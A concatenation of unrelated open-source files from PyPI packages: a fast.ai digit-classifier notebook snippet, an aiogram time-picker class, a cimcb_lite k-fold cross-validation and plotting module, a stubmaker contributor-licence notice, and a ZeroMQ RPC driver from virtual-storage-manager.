# Demonstrate a horizontal-flip transform on a single training digit.
flip_tfm = RandTransform(tfm=TfmPixel(flip_lr), kwargs={}, p=1, resolved={}, do_run=True, is_random=True, use_on_y=True)
folder = TRAIN/"3"
filename = os.listdir(folder)[0]
# NOTE(review): `folder` already contains TRAIN, so TRAIN/folder joins the
# prefix twice ("../train/../train/3") -- verify this path is intended.
img = open_image(TRAIN/folder/filename)
display(img)
display(img.apply_tfms(flip_tfm))
# Try alternative architectures (pretrained and from scratch).
tfms = get_transforms(do_flip=False)
learn = cnn_learner(data, base_arch=models.densenet169, metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
learn = cnn_learner(data, base_arch=models.densenet169, pretrained=False, metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
import torchvision.models
learn = Learner(data, torchvision.models.googlenet(), metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
learn = Learner(data, torchvision.models.googlenet(pretrained=True), metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
class CNN(nn.Module):
    """Empty skeleton showing the shape of a custom PyTorch module.

    Superseded by the full CNN definition below; kept as a template.
    """
    def __init__(self):
        super(CNN, self).__init__()
        # here you instantiate all the layers of the neural network and the activation function
    def forward(self, x):
        # here you define the forward propagation
        return x
batch_size = 16

class CNN(nn.Module):
    """Two-conv-layer classifier for 28x28 RGB digit images.

    Input is 28x28 with 3 channels: the source data was grayscale, but
    fast.ai loads the exported JPEGs as RGB. Output is a (N, 10) tensor
    of raw class logits.
    """

    def __init__(self):
        super(CNN, self).__init__()
        self.conv1 = nn.Conv2d(3, 16, 3, padding=1)
        self.conv2 = nn.Conv2d(16, 32, 3, padding=1)
        self.pool = nn.MaxPool2d(2, 2)
        self.fc1 = nn.Linear(7*7*32, 500)
        self.fc2 = nn.Linear(500, 10)
        self.relu = nn.ReLU()

    def forward(self, x):
        # (N, 3, 28, 28) -> conv -> (N, 16, 28, 28) -> pool -> (N, 16, 14, 14)
        x = self.relu(self.pool(self.conv1(x)))
        # -> conv -> (N, 32, 14, 14) -> pool -> (N, 32, 7, 7)
        x = self.relu(self.pool(self.conv2(x)))
        # Flatten each image in the batch for the fully connected head.
        x = x.view(-1, 7*7*32)
        x = self.relu(self.fc1(x))
        # No activation on the final layer: cross-entropy expects raw
        # logits, and the original trailing ReLU clamped them to >= 0.
        # (Debug print() calls also removed from the hot path.)
        return self.fc2(x)
# Train the hand-written CNN defined above via the fast.ai Learner API.
learn = Learner(data, CNN(), metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
|
PypiClean
|
/aiogram_timepicker-0.2.0-py3-none-any.whl/aiogram_timepicker/clock/single/c24_ts3/timepicker.py
|
from aiogram.types import CallbackQuery
from aiogram.utils.callback_data import CallbackData
from aiogram_timepicker import utils as lib_utils
from aiogram_timepicker.result import Result
from ..base import BaseTimePicker
from . import timepicker_callback, _default, utils
class TimePicker(BaseTimePicker):
    """Single-selection 24-hour time picker built on BaseTimePicker.

    Labels and time formats default to this package's `_default` mapping
    and can be overridden through keyword arguments.
    """

    def __init__(self, callback: CallbackData = timepicker_callback, **kwargs):
        super().__init__(callback, **kwargs)
        # Start from package defaults; kwargs_params() below may override.
        self.label_empty = _default['empty']
        self.label_center = _default['center']
        self.label_select = _default['select']
        self.label_cancel = _default['cancel']
        self.time_format = _default['time_format']
        self.time_current_format = _default['time_current_format']
        # Button factory / insert callbacks used when the keyboard is rendered.
        self.functions = lib_utils.Functions(
            utils.default_create_time_button,
            utils.default_insert_time_button,
            None,
            None,
            utils.default_create_cancel_button,
            utils.default_insert_cancel_button,
            utils.default_create_back_button,
            utils.default_insert_back_button,
            create_select=utils.default_create_select_button,
            insert_select=utils.default_insert_select_button,
        )
        self.kwargs_params(**kwargs)

    def kwargs_params(self, **kwargs):
        """Apply label/format overrides passed as keyword arguments.

        NOTE(review): label_center is set in __init__ but cannot be
        overridden here -- confirm whether that is intentional.
        """
        self.label_empty = kwargs.get('label_empty', self.label_empty or _default['empty'])
        self.label_select = kwargs.get('label_select', self.label_select or _default['select'])
        self.label_cancel = kwargs.get('label_cancel', self.label_cancel or _default['cancel'])
        # Formats are only touched when the key is explicitly present, so a
        # falsy value falls back to the package default.
        if 'time_format' in kwargs:
            self.time_format = kwargs.get('time_format') or _default.get('time_format')
        if 'time_current_format' in kwargs:
            self.time_current_format = kwargs.get('time_current_format') or _default.get('time_current_format')

    async def process_selection(self, query: CallbackQuery, data: CallbackData) -> Result:
        """
        Process the callback_query. This method generates a new time picker if forward or
        backward is pressed. This method should be called inside a CallbackQueryHandler.

        :param query: callback_query, as provided by the CallbackQueryHandler
        :param data: callback_data, dictionary, set by `self.callback` (default timepicker_callback)
        :return: Returns an aiogram_timepicker.result.Result object.
        """
        r = await super().process_selection(query, data)
        # The base picker reports the chosen value in `seconds`; this
        # 24-hour variant reinterprets that value as hours.
        r.hours = r.seconds
        r.seconds = 0
        r.editable = False
        return r
|
PypiClean
|
/cimcb_lite-1.0.2.tar.gz/cimcb_lite-1.0.2/cimcb_lite/cross_val/kfold.py
|
import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from bokeh.layouts import gridplot
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource
from bokeh.models import Circle, HoverTool, TapTool, LabelSet
from tqdm import tqdm
from bokeh.plotting import output_notebook, show
from .BaseCrossVal import BaseCrossVal
from ..utils import binary_metrics
class kfold(BaseCrossVal):
    """Exhaustive search over param_dict calculating binary metrics.

    Parameters
    ----------
    model : object
        This object is assumed to store bootlist attributes in .model (e.g. modelPLS.model.x_scores_).

    X : array-like, shape = [n_samples, n_features]
        Predictor variables, where n_samples is the number of samples and n_features is the number of predictors.

    Y : array-like, shape = [n_samples, 1]
        Response variables, where n_samples is the number of samples.

    param_dict : dict
        List of attributes to calculate and return bootstrap confidence intervals.

    folds: : a positive integer, (default 10)
        The number of folds used in the computation.

    bootnum : a positive integer, (default 100)
        The number of bootstrap samples used in the computation for the plot.

    Methods
    -------
    Run: Runs all necessary methods prior to plot.

    Plot: Creates a R2/Q2 plot.
    """

    def __init__(self, model, X, Y, param_dict, folds=10, bootnum=100):
        super().__init__(model=model, X=X, Y=Y, param_dict=param_dict, folds=folds, bootnum=bootnum)
        self.crossval_idx = StratifiedKFold(n_splits=folds)

    def calc_ypred(self):
        """Calculates ypred full and ypred cv."""
        self.ypred_full = []
        self.ypred_cv = []
        for params in self.param_list:
            # Build a model with this hyper-parameter combination.
            model_i = self.model(**params)
            # Full: train and predict on the entire data set.
            model_i.train(self.X, self.Y)
            ypred_full_i = model_i.test(self.X)
            self.ypred_full.append(ypred_full_i)
            # CV: out-of-fold prediction for every sample.
            ypred_cv_i = self._calc_cv_ypred(model_i, self.X, self.Y)
            self.ypred_cv.append(ypred_cv_i)

    def calc_stats(self):
        """Calculates binary statistics from ypred full and ypred cv."""
        stats_list = []
        for i in range(len(self.param_list)):
            # Create dictionaries with binary_metrics
            stats_full_i = binary_metrics(self.Y, self.ypred_full[i])
            stats_cv_i = binary_metrics(self.Y, self.ypred_cv[i])
            # Rename columns so full/cv metrics can coexist in one table.
            stats_full_i = {k + "full": v for k, v in stats_full_i.items()}
            stats_cv_i = {k + "cv": v for k, v in stats_cv_i.items()}
            stats_cv_i["R²"] = stats_full_i.pop("R²full")
            stats_cv_i["Q²"] = stats_cv_i.pop("R²cv")
            # Combine and append
            stats_combined = {**stats_full_i, **stats_cv_i}
            stats_list.append(stats_combined)
        self.table = self._format_table(stats_list)  # Transpose, Add headers
        return self.table

    def run(self):
        """Runs all functions prior to plot."""
        self.calc_ypred()
        self.calc_stats()
        # Bootstrap confidence intervals are only needed when bootnum > 1.
        if self.bootnum > 1:
            self.calc_ypred_boot()
            self.calc_stats_boot()

    def calc_ypred_boot(self):
        """Calculates ypred full and ypred cv for each bootstrap resample."""
        self.ytrue_boot = []
        self.ypred_full_boot = []
        self.ypred_cv_boot = []
        for i in tqdm(range(self.bootnum), desc="Kfold"):
            # Resample with replacement.
            bootidx_i = np.random.choice(len(self.Y), len(self.Y))
            newX = self.X[bootidx_i, :]
            newY = self.Y[bootidx_i]
            ypred_full_nboot_i = []
            ypred_cv_nboot_i = []
            for params in self.param_list:
                model_i = self.model(**params)
                # Full fit/predict on the resample.
                model_i.train(newX, newY)
                ypred_full_i = model_i.test(newX)
                ypred_full_nboot_i.append(ypred_full_i)
                # CV on the resample.
                ypred_cv_i = self._calc_cv_ypred(model_i, newX, newY)
                ypred_cv_nboot_i.append(ypred_cv_i)
            self.ytrue_boot.append(newY)
            self.ypred_full_boot.append(ypred_full_nboot_i)
            self.ypred_cv_boot.append(ypred_cv_nboot_i)

    def calc_stats_boot(self):
        """Calculates binary statistics from ypred full and ypred cv for each bootstrap resample."""
        self.full_boot_metrics = []
        self.cv_boot_metrics = []
        for i in range(len(self.param_list)):
            stats_full_i = []
            stats_cv_i = []
            for j in range(self.bootnum):
                stats_full = binary_metrics(self.ytrue_boot[j], self.ypred_full_boot[j][i])
                stats_full_i.append(stats_full)
                stats_cv = binary_metrics(self.ytrue_boot[j], self.ypred_cv_boot[j][i])
                stats_cv_i.append(stats_cv)
            self.full_boot_metrics.append(stats_full_i)
            self.cv_boot_metrics.append(stats_cv_i)

    def _calc_cv_ypred(self, model_i, X, Y):
        """Method used to calculate ypred cv."""
        ypred_cv_i = [None] * len(Y)
        # Fix: split on the data actually being cross-validated (X, Y)
        # rather than self.X/self.Y. calc_ypred_boot passes bootstrap
        # resamples here, and stratifying on the original labels would
        # produce folds that do not match the resampled data.
        for train, test in self.crossval_idx.split(X, Y):
            X_train = X[train, :]
            Y_train = Y[train]
            X_test = X[test, :]
            model_i.train(X_train, Y_train)
            ypred_cv_i_j = model_i.test(X_test)
            # Place each fold's predictions back at their original indices.
            for (idx, val) in zip(test, ypred_cv_i_j):
                ypred_cv_i[idx] = val.tolist()
        return ypred_cv_i

    def _format_table(self, stats_list):
        """Make stats pretty (pandas table -> proper names in columns)."""
        table = pd.DataFrame(stats_list).T
        table.columns = [str(params) for params in self.param_list]
        return table

    def plot(self, metric="r2q2"):
        """Create a full/cv plot using based on metric selected.

        Parameters
        ----------
        metric : string, (default "r2q2")
            metric has to be either "r2q2", "auc", "acc", "f1score", "prec", "sens", or "spec".
        """
        # Choose metric to plot
        metric_title = np.array(["ACCURACY", "AUC", "F1-SCORE", "PRECISION", "R²", "SENSITIVITY", "SPECIFICITY"])
        metric_list = np.array(["acc", "auc", "f1score", "prec", "r2q2", "sens", "spec"])
        metric_idx = np.where(metric_list == metric)[0][0]

        # get full, cv, and diff
        full = self.table.iloc[2 * metric_idx + 1]
        cv = self.table.iloc[2 * metric_idx]
        diff = abs(full - cv)
        full_text = self.table.iloc[2 * metric_idx + 1].name
        cv_text = self.table.iloc[2 * metric_idx].name
        diff_text = "DIFFERENCE " + "(" + full_text + " - " + cv_text + ")"

        # round full, cv, and diff for hovertool
        full_hover = ["%.2f" % round(value, 2) for value in full]
        cv_hover = ["%.2f" % round(value, 2) for value in cv]
        diff_hover = ["%.2f" % round(value, 2) for value in diff]

        # param_dict is expected to hold a single hyper-parameter; its
        # values become the x-axis labels (the last entry wins if several).
        values = list(self.param_dict.values())[-1]
        values_string = [str(i) for i in values]

        # store data in ColumnDataSource for Bokeh
        data = dict(full=full, cv=cv, diff=diff, full_hover=full_hover, cv_hover=cv_hover, diff_hover=diff_hover, values_string=values_string)
        source = ColumnDataSource(data=data)

        fig1_yrange = (min(diff) - max(0.1 * (min(diff)), 0.1), max(diff) + max(0.1 * (max(diff)), 0.1))
        fig1_xrange = (min(cv) - max(0.1 * (min(cv)), 0.1), max(cv) + max(0.1 * (max(cv)), 0.1))
        fig1_title = diff_text + " vs " + cv_text

        # Figure 1 (DIFFERENCE (R2 - Q2) vs. Q2)
        fig1 = figure(x_axis_label=cv_text, y_axis_label=diff_text, title=fig1_title, tools="tap,pan,wheel_zoom,box_zoom,reset,save,lasso_select,box_select", y_range=fig1_yrange, x_range=fig1_xrange, plot_width=485, plot_height=405)

        # Figure 1: Add a line
        fig1_line = fig1.line(cv, diff, line_width=2, line_color="black", line_alpha=0.25)

        # Figure 1: Add circles (interactive click)
        fig1_circ = fig1.circle("cv", "diff", size=17, alpha=0.7, color="green", source=source)
        fig1_circ.selection_glyph = Circle(fill_color="green", line_width=2, line_color="black", fill_alpha=0.6)
        fig1_circ.nonselection_glyph.fill_color = "green"
        fig1_circ.nonselection_glyph.fill_alpha = 0.4
        fig1_circ.nonselection_glyph.line_color = "white"
        fig1_text = fig1.text(x="cv", y="diff", text="values_string", source=source, text_font_size="10pt", text_color="white", x_offset=-3.5, y_offset=7)
        fig1_text.nonselection_glyph.text_color = "white"
        fig1_text.nonselection_glyph.text_alpha = 0.6

        # Figure 1: Add hovertool
        fig1.add_tools(HoverTool(renderers=[fig1_circ], tooltips=[(full_text, "@full_hover"), (cv_text, "@cv_hover"), ("Diff", "@diff_hover")]))

        # Figure 1: Extra formating
        # Fix: compare strings with ==, not `is` (identity is not
        # guaranteed for equal strings and raises SyntaxWarning on 3.8+).
        fig1.axis.major_label_text_font_size = "8pt"
        if metric == "r2q2" or metric == "auc":
            fig1.title.text_font_size = "12pt"
            fig1.xaxis.axis_label_text_font_size = "10pt"
            fig1.yaxis.axis_label_text_font_size = "10pt"
        else:
            fig1.title.text_font_size = "10pt"
            fig1.xaxis.axis_label_text_font_size = "9pt"
            fig1.yaxis.axis_label_text_font_size = "9pt"

        # Figure 2: full/cv
        fig2_title = full_text + " & " + cv_text + " vs no. of components"
        fig2 = figure(x_axis_label="components", y_axis_label="Value", title=fig2_title, plot_width=485, plot_height=405, x_range=pd.unique(values_string), y_range=(0, 1.1), tools="pan,wheel_zoom,box_zoom,reset,save,lasso_select,box_select")

        # Figure 2: add confidence intervals if bootnum > 1
        if self.bootnum > 1:
            lower_ci_full = []
            upper_ci_full = []
            lower_ci_cv = []
            upper_ci_cv = []
            # Get all upper, lower 95% CI (full/cv) for each specific n_component and append
            for m in range(len(self.full_boot_metrics)):
                full_boot = []
                cv_boot = []
                for k in range(len(self.full_boot_metrics[0])):
                    full_boot.append(self.full_boot_metrics[m][k][metric_title[metric_idx]])
                    cv_boot.append(self.cv_boot_metrics[m][k][metric_title[metric_idx]])
                # Bias-corrected percentile 95% CI.
                full_bias = np.mean(full_boot) - full[m]
                cv_bias = np.mean(cv_boot) - cv[m]
                lower_ci_full.append(np.percentile(full_boot, 2.5) - full_bias)
                upper_ci_full.append(np.percentile(full_boot, 97.5) - full_bias)
                lower_ci_cv.append(np.percentile(cv_boot, 2.5) - cv_bias)
                upper_ci_cv.append(np.percentile(cv_boot, 97.5) - cv_bias)

            # Plot as a patch
            x_patch = np.hstack((values_string, values_string[::-1]))
            y_patch_r2 = np.hstack((lower_ci_full, upper_ci_full[::-1]))
            fig2.patch(x_patch, y_patch_r2, alpha=0.10, color="red")
            y_patch_q2 = np.hstack((lower_ci_cv, upper_ci_cv[::-1]))
            fig2.patch(x_patch, y_patch_q2, alpha=0.10, color="blue")

        # Figure 2: add full
        fig2_line_full = fig2.line(values_string, full, line_color="red", line_width=2)
        fig2_circ_full = fig2.circle("values_string", "full", line_color="red", fill_color="white", fill_alpha=1, size=8, source=source, legend=full_text)
        fig2_circ_full.selection_glyph = Circle(line_color="red", fill_color="white", line_width=2)
        fig2_circ_full.nonselection_glyph.line_color = "red"
        fig2_circ_full.nonselection_glyph.fill_color = "white"
        fig2_circ_full.nonselection_glyph.line_alpha = 0.4

        # Figure 2: add cv
        fig2_line_cv = fig2.line(values_string, cv, line_color="blue", line_width=2)
        fig2_circ_cv = fig2.circle("values_string", "cv", line_color="blue", fill_color="white", fill_alpha=1, size=8, source=source, legend=cv_text)
        fig2_circ_cv.selection_glyph = Circle(line_color="blue", fill_color="white", line_width=2)
        fig2_circ_cv.nonselection_glyph.line_color = "blue"
        fig2_circ_cv.nonselection_glyph.fill_color = "white"
        fig2_circ_cv.nonselection_glyph.line_alpha = 0.4

        # Add hovertool and taptool
        fig2.add_tools(HoverTool(renderers=[fig2_circ_full], tooltips=[(full_text, "@full_hover")], mode="vline"))
        fig2.add_tools(HoverTool(renderers=[fig2_circ_cv], tooltips=[(cv_text, "@cv_hover")], mode="vline"))
        fig2.add_tools(TapTool(renderers=[fig2_circ_full, fig2_circ_cv]))

        # Figure 2: Extra formating
        fig2.axis.major_label_text_font_size = "8pt"
        if metric == "r2q2" or metric == "auc":
            fig2.title.text_font_size = "12pt"
            fig2.xaxis.axis_label_text_font_size = "10pt"
            fig2.yaxis.axis_label_text_font_size = "10pt"
        else:
            fig2.title.text_font_size = "10pt"
            fig2.xaxis.axis_label_text_font_size = "9pt"
            fig2.yaxis.axis_label_text_font_size = "9pt"

        # Figure 2: legend
        if metric == "r2q2":
            fig2.legend.location = "top_left"
        else:
            fig2.legend.location = "bottom_right"

        # Create a grid and output figures
        grid = np.full((1, 2), None)
        grid[0, 0] = fig1
        grid[0, 1] = fig2
        fig = gridplot(grid.tolist(), merge_tools=True)
        output_notebook()
        show(fig)
|
PypiClean
|
/openlabs_stock_production_location-3.4.0.1.tar.gz/openlabs_stock_production_location-3.4.0.1/README.rst
|
Stock production location
=========================
Tryton production orders by default take inputs from the storage
zone of the warehouse where the production is happening. On assigning
the production order tries to pick the inputs from any sublocation of
the storage zone of the warehouse where the product is available.
While this feature is handy, there are businesses which have clearly
defined processes having the inventory in designated areas for designated
purposes. It might be crucial to limit access to the ``from location``
from which inputs can be picked and the ``to location`` to which the
output can be sent.
Features
--------
1. Ability to configure default input and output zones for production
locations of a warehouse. For example, production location ``assembly``
could have the default input location as ``ready to finish`` and the
output location as ``Finished Goods``.
2. Ability to limit the locations in which the production order should
look for input inventory, instead of searching the whole warehouse.
I don't like what this module does!
-----------------------------------
Don't use it :-)
|
PypiClean
|
/stubmaker-0.0.3.tar.gz/stubmaker-0.0.3/CONTRIBUTING.md
|
# Notice to external contributors
## General info
Hello! In order for us (YANDEX LLC) to accept patches and other contributions from you, you will have to adopt our Yandex Contributor License Agreement (the “**CLA**”). The current version of the CLA can be found here:
1) https://yandex.ru/legal/cla/?lang=en (in English) and
2) https://yandex.ru/legal/cla/?lang=ru (in Russian).
By adopting the CLA, you state the following:
* You obviously wish and are willingly licensing your contributions to us for our open source projects under the terms of the CLA,
* You have read the terms and conditions of the CLA and agree with them in full,
* You are legally able to provide and license your contributions as stated,
* We may use your contributions for our open source projects and for any other project too,
* We rely on your assurances concerning the rights of third parties in relation to your contributions.
If you agree with these principles, please read and adopt our CLA. By providing us your contributions, you hereby declare that you have already read and adopt our CLA, and we may freely merge your contributions with our corresponding open source project and use it further in accordance with terms and conditions of the CLA.
## Provide contributions
If you have already adopted terms and conditions of the CLA, you are able to provide your contributions. When you submit your first pull request, please add the following information into it:
```
I hereby agree to the terms of the CLA available at: [link].
```
Replace the bracketed text as follows:
* [link] is the link to the current version of the CLA: https://yandex.ru/legal/cla/?lang=en (in English) or https://yandex.ru/legal/cla/?lang=ru (in Russian).
It is enough to provide this notification only once.
## Other questions
If you have any questions, please mail us at [email protected].
|
PypiClean
|
/virtual-storage-manager-2.0.2.tar.gz/virtual-storage-manager-2.0.2/vsm/openstack/common/rpc/impl_zmq.py
|
# Copyright 2011 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import pprint
import re
import socket
import sys
import types
import uuid
import eventlet
import greenlet
from oslo.config import cfg
from vsm.openstack.common import excutils
from vsm.openstack.common.gettextutils import _
from vsm.openstack.common import importutils
from vsm.openstack.common import jsonutils
from vsm.openstack.common import processutils as utils
from vsm.openstack.common.rpc import common as rpc_common
zmq = importutils.try_import('eventlet.green.zmq')
# for convenience, are not modified.
pformat = pprint.pformat
Timeout = eventlet.timeout.Timeout
LOG = rpc_common.LOG
RemoteError = rpc_common.RemoteError
RPCException = rpc_common.RPCException
zmq_opts = [
cfg.StrOpt('rpc_zmq_bind_address', default='*',
help='ZeroMQ bind address. Should be a wildcard (*), '
'an ethernet interface, or IP. '
'The "host" option should point or resolve to this '
'address.'),
# The module.Class to use for matchmaking.
cfg.StrOpt(
'rpc_zmq_matchmaker',
default=('vsm.openstack.common.rpc.'
'matchmaker.MatchMakerLocalhost'),
help='MatchMaker driver',
),
# The following port is unassigned by IANA as of 2012-05-21
cfg.IntOpt('rpc_zmq_port', default=9501,
help='ZeroMQ receiver listening port'),
cfg.IntOpt('rpc_zmq_contexts', default=1,
help='Number of ZeroMQ contexts, defaults to 1'),
cfg.IntOpt('rpc_zmq_topic_backlog', default=None,
help='Maximum number of ingress messages to locally buffer '
'per topic. Default is unlimited.'),
cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack',
help='Directory for holding IPC sockets'),
cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(),
help='Name of this node. Must be a valid hostname, FQDN, or '
'IP address. Must match "host" option, if running Nova.')
]
CONF = cfg.CONF
CONF.register_opts(zmq_opts)
ZMQ_CTX = None # ZeroMQ Context, must be global.
matchmaker = None # memoized matchmaker object
def _serialize(data):
    """
    Serialization wrapper

    We prefer using JSON, but it cannot encode all types.
    Error if a developer passes us bad data.
    """
    try:
        # ensure_ascii=True escapes non-ASCII characters, keeping the
        # wire format plain ASCII.
        return jsonutils.dumps(data, ensure_ascii=True)
    except TypeError:
        # Log the failure, then let save_and_reraise_exception propagate
        # the original TypeError to the caller.
        with excutils.save_and_reraise_exception():
            LOG.error(_("JSON serialization failed."))
def _deserialize(data):
    """
    Deserialization wrapper

    Parse a JSON string produced by _serialize back into Python objects.
    """
    LOG.debug(_("Deserializing: %s"), data)
    return jsonutils.loads(data)
class ZmqSocket(object):
    """
    A tiny wrapper around ZeroMQ to simplify the send/recv protocol
    and connection management.

    Can be used as a Context (supports the 'with' statement).
    """

    def __init__(self, addr, zmq_type, bind=True, subscribe=None):
        # zmq is imported via eventlet.green for cooperative blocking.
        self.sock = _get_ctxt().socket(zmq_type)
        self.addr = addr
        self.type = zmq_type
        self.subscriptions = []

        # Support failures on sending/receiving on wrong socket type.
        self.can_recv = zmq_type in (zmq.PULL, zmq.SUB)
        self.can_send = zmq_type in (zmq.PUSH, zmq.PUB)
        self.can_sub = zmq_type in (zmq.SUB, )

        # Support list, str, & None for subscribe arg (cast to list)
        do_sub = {
            list: subscribe,
            str: [subscribe],
            type(None): []
        }[type(subscribe)]

        for f in do_sub:
            self.subscribe(f)

        str_data = {'addr': addr, 'type': self.socket_s(),
                    'subscribe': subscribe, 'bind': bind}

        LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data)
        LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data)
        LOG.debug(_("-> bind: %(bind)s"), str_data)

        try:
            # Servers bind; clients connect.
            if bind:
                self.sock.bind(addr)
            else:
                self.sock.connect(addr)
        except Exception:
            raise RPCException(_("Could not open socket."))

    def socket_s(self):
        """Get socket type as string."""
        t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER',
                  'DEALER')
        # Build a reverse map from zmq's numeric constants to their names.
        return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type]

    def subscribe(self, msg_filter):
        """Subscribe."""
        if not self.can_sub:
            raise RPCException("Cannot subscribe on this socket.")
        LOG.debug(_("Subscribing to %s"), msg_filter)

        try:
            self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter)
        except Exception:
            # Best-effort: if setsockopt fails, the filter is not
            # registered, so it must not be recorded in subscriptions.
            return

        self.subscriptions.append(msg_filter)

    def unsubscribe(self, msg_filter):
        """Unsubscribe."""
        # Ignore filters that were never successfully subscribed.
        if msg_filter not in self.subscriptions:
            return
        self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter)
        self.subscriptions.remove(msg_filter)

    def close(self):
        # Close the socket exactly once; subsequent calls are no-ops.
        if self.sock is None or self.sock.closed:
            return

        # We must unsubscribe, or we'll leak descriptors.
        if len(self.subscriptions) > 0:
            for f in self.subscriptions:
                try:
                    self.sock.setsockopt(zmq.UNSUBSCRIBE, f)
                except Exception:
                    pass
            self.subscriptions = []

        try:
            # Default is to linger
            self.sock.close()
        except Exception:
            # While this is a bad thing to happen,
            # it would be much worse if some of the code calling this
            # were to fail. For now, lets log, and later evaluate
            # if we can safely raise here.
            LOG.error("ZeroMQ socket could not be closed.")
        self.sock = None

    def recv(self):
        """Receive one multipart message; raises on send-only sockets."""
        if not self.can_recv:
            raise RPCException(_("You cannot recv on this socket."))
        return self.sock.recv_multipart()

    def send(self, data):
        """Send one multipart message; raises on receive-only sockets."""
        if not self.can_send:
            raise RPCException(_("You cannot send on this socket."))
        self.sock.send_multipart(data)
class ZmqClient(object):
    """Client for ZMQ sockets."""

    def __init__(self, addr, socket_type=None, bind=False):
        if socket_type is None:
            socket_type = zmq.PUSH
        self.outq = ZmqSocket(addr, socket_type, bind=bind)

    def cast(self, msg_id, topic, data, envelope=False):
        """Send a fire-and-forget message on the outbound socket.

        NOTE: this module targets Python 2 -- `map(bytes, ...)` yields a
        list and `reduce` is a builtin; neither holds on Python 3.
        """
        msg_id = msg_id or 0

        # Legacy (pre-envelope) wire format.
        if not (envelope or rpc_common._SEND_RPC_ENVELOPE):
            self.outq.send(map(bytes,
                           (msg_id, topic, 'cast', _serialize(data))))
            return

        # Envelope format: flatten the envelope dict's key/value pairs
        # into the multipart frames after the 'impl_zmq_v2' marker.
        rpc_envelope = rpc_common.serialize_msg(data[1], envelope)
        zmq_msg = reduce(lambda x, y: x + y, rpc_envelope.items())
        self.outq.send(map(bytes,
                       (msg_id, topic, 'impl_zmq_v2', data[0]) + zmq_msg))

    def close(self):
        self.outq.close()
class RpcContext(rpc_common.CommonRpcContext):
    """Context that supports replying to a rpc.call."""

    def __init__(self, **kwargs):
        # Replies accumulated by reply(); collected when the call completes.
        self.replies = []
        super(RpcContext, self).__init__(**kwargs)

    def deepcopy(self):
        """Return a new RpcContext carrying the same values and replies."""
        values = self.to_dict()
        values['replies'] = self.replies
        return self.__class__(**values)

    def reply(self, reply=None, failure=None, ending=False):
        """Buffer one reply payload; `ending` markers carry no payload."""
        if ending:
            return
        self.replies.append(reply)

    # Fix: classmethods conventionally name their first parameter `cls`,
    # not `self` (it receives the class, not an instance). Callers are
    # unaffected since the first argument is passed implicitly.
    @classmethod
    def marshal(cls, ctx):
        """Serialize a context's dict form for transmission."""
        ctx_data = ctx.to_dict()
        return _serialize(ctx_data)

    @classmethod
    def unmarshal(cls, data):
        """Rebuild an RpcContext from its serialized dict form."""
        return RpcContext.from_dict(_deserialize(data))
class InternalContext(object):
    """Used by ConsumerBase as a private context for - methods."""

    def __init__(self, proxy):
        self.proxy = proxy
        self.msg_waiter = None

    def _get_response(self, ctx, proxy, topic, data):
        """Process a curried message and cast the result to topic."""
        LOG.debug(_("Running func with context: %s"), ctx.to_dict())
        data.setdefault('version', None)
        data.setdefault('args', {})

        try:
            result = proxy.dispatch(
                ctx, data['version'], data['method'], **data['args'])
            return ConsumerBase.normalize_reply(result, ctx.replies)
        except greenlet.GreenletExit:
            # ignore these since they are just from shutdowns
            pass
        except rpc_common.ClientException, e:
            # Expected (client-declared) exceptions are serialized without
            # being logged as failures. (Python 2 except syntax.)
            LOG.debug(_("Expected exception during message handling (%s)") %
                      e._exc_info[1])
            return {'exc':
                    rpc_common.serialize_remote_exception(e._exc_info,
                                                          log_failure=False)}
        except Exception:
            # Unexpected exceptions are serialized for the remote caller.
            LOG.error(_("Exception during message handling"))
            return {'exc':
                    rpc_common.serialize_remote_exception(sys.exc_info())}

    def reply(self, ctx, proxy,
              msg_id=None, context=None, topic=None, msg=None):
        """Reply to a casted call."""
        # Our real method is curried into msg['args']
        child_ctx = RpcContext.unmarshal(msg[0])
        response = ConsumerBase.normalize_reply(
            self._get_response(child_ctx, proxy, topic, msg[1]),
            ctx.replies)

        LOG.debug(_("Sending reply"))
        _multi_send(_cast, ctx, topic, {
            'method': '-process_reply',
            'args': {
                'msg_id': msg_id,  # Include for Folsom compat.
                'response': response
            }
        }, _msg_id=msg_id)
class ConsumerBase(object):
    """Base Consumer."""

    def __init__(self):
        # Private context used for internally-dispatched ('-'-prefixed)
        # methods.
        self.private_ctx = InternalContext(None)

    # Fix: classmethods conventionally name their first parameter `cls`,
    # not `self`. Callers are unaffected (the argument is implicit).
    @classmethod
    def normalize_reply(cls, result, replies):
        """Normalize a dispatch result into a list of reply payloads.

        Generators are materialized; buffered replies (if any) take
        precedence over the direct return value.
        """
        #TODO(ewindisch): re-evaluate and document this method.
        if isinstance(result, types.GeneratorType):
            return list(result)
        elif replies:
            return replies
        else:
            return [result]

    def process(self, proxy, ctx, data):
        """Dispatch one decoded message to *proxy*.

        Method names starting with '-' are reserved for internal
        handling (they are not valid Python identifiers) and are run
        with the private internal context for safety.
        """
        data.setdefault('version', None)
        data.setdefault('args', {})

        method = data.get('method')
        if not method:
            LOG.error(_("RPC message did not include method."))
            return

        # Internal method: uses internal context for safety.
        if method == '-reply':
            self.private_ctx.reply(ctx, proxy, **data['args'])
            return

        proxy.dispatch(ctx, data['version'],
                       data['method'], **data['args'])
class ZmqBaseReactor(ConsumerBase):
    """
    A consumer class implementing a
    centralized casting broker (PULL-PUSH)
    for RoundRobin requests.
    """

    def __init__(self, conf):
        super(ZmqBaseReactor, self).__init__()

